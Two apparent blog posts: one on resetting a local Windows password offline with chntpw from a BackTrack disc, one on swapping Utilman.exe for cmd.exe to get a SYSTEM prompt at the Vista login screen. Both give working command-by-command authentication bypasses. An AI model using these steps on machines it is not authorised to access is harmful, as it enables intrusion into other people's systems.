Category: Windows Security

Reset Your Windows Password

We have lots of password to remember : workstation, servers, banks, forums, mails etc… This makes forgetting passwords easier. Today I would like to mention how to remove reset admin password on windows.

I am going to use chntpw. chntpw is a Linux utility to (re)set the password of any user that has a valid (local) account on your WinNT or Win2000 system, by modifying the crypted password in the registry’s SAM file. You do not need to know the old password to set a new one. It works offline (i.e., you have to shutdown your computer and boot off a linux floppy disk).

1. Insert Backtrack’s DVD on your windows computer and boot from CD (usually you can hit f2, f12 in order to see boot order, then you can force computer to boot from CD/DVD).

2. Mount your windows partition:

2.1. Run fdisk -l to determine where is your windows partition.
My windows partition is /dev/sda1

2.2 Create empty folder to mount windows partition.
mkdir /mnt/windows

2.3mount /dev/sda1 /mnt/windows

3. Go into chntpw directory
cd /pentest/passwords/chntpw

4. Run chntpw against your SAM

./chntpw -i /mnt/windows//WINDOWS/system32/config/SAM
5. Type the username you want to reset password, enter, then press 1, enter.

6. After made the changes,  you need to exit from the main chntpw menu and press “Y” to write the changes or “N”to ignore the changes.

 

Owning Windows Vista with Linux

In this blog post I want to show you a security problem related to Windows Vista.

Vista is criticized for mostly because it uses too much resources.  However do you know that you can “own” the Vista by using Linux.

That is right, you can get access to Vista without any password cracking or anything.

First, boot your machine with Linux.

Go to Windows partition:

cd /mnt/sda1 -a

Now, go to System32 directory:

cd Windows/System32

Backup Utilman.exe file:

mv Utilman.exe Utilman_backup.exe

Copy cmd.exe as Utilman.exe

cp cmd.exe Utilman.exe

Now reboot the machine and remove Linux live CD from CD room.

WindowsVistaHacking

Press CTRL+U to invoke utility manager.

Now, command prompt should be appeared since we have cmd.exe instead of original Utilman.exe

Type whoami to see who you are: System!!!

Type explorer and you can do whatever you want!

capture22

This simple example shows how physical security is important in your company or even at home.